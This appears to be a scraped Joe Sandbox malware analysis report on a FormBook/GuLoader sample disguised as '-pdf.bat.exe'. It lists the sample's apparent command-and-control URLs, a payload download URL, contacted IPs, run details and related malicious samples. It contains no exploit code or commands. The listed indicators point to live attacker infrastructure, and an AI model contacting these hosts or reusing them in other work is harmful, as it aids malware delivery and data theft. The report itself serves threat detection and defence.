              http://www.whats-in-the-box.org/bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o=true
                		unknown
                http://www.dxeg.lol/ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0true
                  		unknown
                  https://fredy.ee/tur.binfalse
                    		unknown
                    http://www.typ67.top/qjs8/true
                      		unknown
                      http://www.dorikis.online/d84b/true
                        		unknown
                        http://www.invicta.world/tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0true
                          		unknown
                          http://www.ngmr.xyz/txr6/true
                            		unknown
                            http://www.dhkatp.vip/yyvd/?oz=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&UJ9=qN-llTKPHxntPrv0true
                              		unknown
                              http://www.tukaari.shop/dlt0/true
                                		unknown
                                http://www.platinumkitchens.info/qo4k/true
                                  		unknown
                                  http://www.komart.shop/qwk1/true
                                    		unknown
                                    http://www.dhkatp.vip/yyvd/true
                                      		unknown
                                      http://www.tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&UJ9=qN-llTKPHxntPrv0true
                                        		unknown
                                        http://www.dfmagazine.shop/7k8f/true
                                          		unknown
                                          http://www.greekhause.org/phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0true
                                            		unknown
                                            http://www.tukaari.shop/dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0true
                                              		unknown
                                              http://www.linkwave.cloud/was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0true
                                                		unknown
                                                http://www.albero-dveri.online/7cy1/true
                                                  		unknown
                                                  http://www.dfmagazine.shop/7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0true
                                                    		unknown
                                                    http://www.ngmr.xyz/txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0true
                                                      		unknown
                                                      http://www.platinumkitchens.info/qo4k/?oz=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=&UJ9=qN-llTKPHxntPrv0true
                                                        		unknown
                                                        http://www.greekhause.org/phvf/true
                                                          		unknown
                                                          http://www.tempatmudisini01.click/iydt/true
                                                            		unknown
                                                            http://fredy.ee/tur.binfalse
                                                              		unknown
                                                              http://www.linkwave.cloud/was5/true
                                                                		unknown
                                                                http://www.albero-dveri.online/7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0true
                                                                  		unknown
                                                                  http://www.typ67.top/qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0true
                                                                    		unknown
                                                                    http://www.komart.shop/qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0true
                                                                      		unknown
                                                                      http://www.dxeg.lol/ytua/true
                                                                        		unknown
                                                                        http://www.whats-in-the-box.org/bqye/true
                                                                          		unknown

                                                                          URLs from Memory and Binaries

                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          https://duckduckgo.com/chrome_newtabipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                          https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_autoijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                                                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                          https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://duckduckgo.com/ac/?q=ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                            https://reg.ruijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalseunknown
                                                                            http://fredy.ee/tur.bint-pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.-pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                		unknown
                                                                                http://www.dorikis.onlineijDRAEBvXKu.exe, 00000003.00000002.42753648495.000000000107A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD-pdf.bat.exe, 00000002.00000001.37862054479.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalseunknown
                                                                                  http://www.gopher.ftp://ftp.-pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4zijDRAEBvXKu.exe, 00000003.00000002.42758358697.000000000560C000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.00000000058CC000.00000004.10000000.00040000.00000000.sdmptrue
                                                                                        		unknown
                                                                                        https://fredy.ee/tur.bint-pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.google.com/images/branding/product/ico/googleg_alldp.icoipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd-pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalseunknown
                                                                                          https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214-pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalseunknown
                                                                                            https://ocsp.quovadisoffshore.com0-pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://fredy.ee/-pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lanijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://nsis.sf.net/NSIS_ErrorError-pdf.bat.exefalse
                                                                                                            		unknown
                                                                                                            http://fredy.ee/tur.binE-pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.ecosia.org/newtab/ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://ac.ecosia.org/autocomplete?q=ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd-pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.quovadis.bm0-pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://gemini.google.com/app?q=ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            103.21.221.4
                                                                                                                            		tempatmudisini01.clickunknown
                                                                                                                            		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                                                            137.175.33.56
                                                                                                                            		dxzz.topUnited States
                                                                                                                            		54600PEGTECHINCUStrue
                                                                                                                            13.248.169.48
                                                                                                                            		www.invicta.worldUnited States
                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                            133.130.35.90
                                                                                                                            		komart.shopJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                            185.86.211.136
                                                                                                                            		fredy.eeSpain
                                                                                                                            		50129TVHORADADAESfalse
                                                                                                                            54.67.87.110
                                                                                                                            		www.ngmr.xyzUnited States
                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                            208.91.197.27
                                                                                                                            		www.inastra.onlineVirgin Islands (BRITISH)
                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                            84.32.84.32
                                                                                                                            		dfmagazine.shopLithuania
                                                                                                                            		33922NTT-LT-ASLTtrue
                                                                                                                            194.58.112.174
                                                                                                                            		www.albero-dveri.onlineRussian Federation
                                                                                                                            		197695AS-REGRUtrue
                                                                                                                            38.47.207.146
                                                                                                                            		typ67.topUnited States
                                                                                                                            		174COGENT-174UStrue
                                                                                                                            162.213.249.216
                                                                                                                            		www.dorikis.onlineUnited States
                                                                                                                            		22612NAMECHEAP-NETUStrue
                                                                                                                            3.33.130.190
                                                                                                                            		whats-in-the-box.orgUnited States
                                                                                                                            		8987AMAZONEXPANSIONGBtrue

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1525408
                                                                                                                            Start date and time:2024-10-04 08:03:30 +02:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 18m 37s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                                            Number of analysed new started processes analysed:5
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Sample name:-pdf.bat.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/7@18/12
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 70%
                                                                                                                            • Number of executed functions: 42
                                                                                                                            • Number of non-executed functions: 263
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            02:06:59API Interceptor33723492x Sleep call for process: ipconfig.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            103.21.221.4UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.tempatmudisini01.click/iydt/
                                                                                                                            RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tempatmudisini01.click/abla/
                                                                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tempatmudisini01.click/phdl/
                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tempatmudisini01.click/lybf/
                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tempatmudisini01.click/r9rj/
                                                                                                                            SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tempatmudisini01.click/abla/
                                                                                                                            137.175.33.56UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.dxeg.lol/ytua/
                                                                                                                            DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.dxeg.lol/rkgs/
                                                                                                                            13.248.169.48payment copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.firstcry.shop/e4x0/
                                                                                                                            Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.invicta.world/aohi/
                                                                                                                            shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.mynotebook.shop/3q2o/
                                                                                                                            Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.sapatarias.online/3632/
                                                                                                                            shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.sapatarias.online/3632/
                                                                                                                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.luxe.guru/s9un/
                                                                                                                            gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.4it.services/bopi/?_FQ8hB=RB9p3Jfq9ZvBoyq8+0+Fmui7HG2krdiIZXqgFfVf6IzsfIQ1CkKG0m46V1pTk3XN6PXG&qL3=eXSlCFXxoF
                                                                                                                            CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.dyme.tech/h7lb/
                                                                                                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.smilechat.shop/ih4n/
                                                                                                                            PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.sapatarias.online/ep7t/

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            www.inastra.onlineSHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                            • 208.91.197.27
                                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 208.91.197.27
                                                                                                                            Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 208.91.197.27
                                                                                                                            PO098765678.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 208.91.197.27
                                                                                                                            www.albero-dveri.onlineUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 194.58.112.174
                                                                                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 194.58.112.174
                                                                                                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 194.58.112.174
                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 194.58.112.174
                                                                                                                            September Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 194.58.112.174
                                                                                                                            dxzz.topupdate SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 137.175.33.56
                                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 137.175.33.56
                                                                                                                            DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 137.175.33.56

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            LINKNET-ID-APLinknetASNIDP030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.87
                                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 139.37.141.74
                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 103.21.221.4
                                                                                                                            ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 139.8.6.3
                                                                                                                            firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 139.40.24.232
                                                                                                                            AMAZON-02UShttps://irp.cdn-website.com/02ccf804/files/uploaded/webpage.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.32.99.71
                                                                                                                            Full Litigation File.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.160.150.68
                                                                                                                            https://go.hginsights.com/rs/214-HYO-692/images/HGGet hashmaliciousUnknownBrowse
                                                                                                                            • 18.245.46.12
                                                                                                                            faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 18.245.86.8
                                                                                                                            faststone-capture_voLss-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                            • 13.225.84.172
                                                                                                                            http://144.126.159.102Get hashmaliciousUnknownBrowse
                                                                                                                            • 18.245.86.107
                                                                                                                            EmK7uT0Tu7.exeGet hashmaliciousNjratBrowse
                                                                                                                            • 13.60.28.43
                                                                                                                            http://144.126.159.102Get hashmaliciousUnknownBrowse
                                                                                                                            • 18.245.86.107
                                                                                                                            http://advertising-copyright-review.d64x5m2z8s6x8.amplifyapp.comGet hashmaliciousUnknownBrowse
                                                                                                                            • 65.9.66.100
                                                                                                                            https://new.express.adobe.com/webpage/41htgUlKyaibOGet hashmaliciousUnknownBrowse
                                                                                                                            • 108.138.26.116
                                                                                                                            PEGTECHINCUSx86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 156.231.123.196
                                                                                                                            update SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 137.175.33.56
                                                                                                                            https://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 192.74.233.14
                                                                                                                            https://ojbkjs.vip/yb.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 107.149.163.248
                                                                                                                            https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                                                                                                                            • 137.175.84.167
                                                                                                                            https://tiktoksh0p.net/Get hashmaliciousUnknownBrowse
                                                                                                                            • 104.37.215.2
                                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 137.175.33.56
                                                                                                                            https://tk815.shop/Get hashmaliciousUnknownBrowse
                                                                                                                            • 107.148.46.163
                                                                                                                            DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 137.175.33.56
                                                                                                                            r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 192.74.233.8

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            37f463bf4616ecd445d4a1937da06e19Cotizaci#U00f3n#12643283.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            BnxBRWQWhy.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            NJna3TEAEr.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            app__v7.5.3_.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            WarzoneCheat.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            FACTURA-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 185.86.211.136
                                                                                                                            file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                            • 185.86.211.136

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dllTERMENII CONTRACTULUI (ACORD NOU#U0102 COMAND#U0102)-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                              f5#U06f6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                f5#U06f6.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                    Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousGuLoaderBrowse
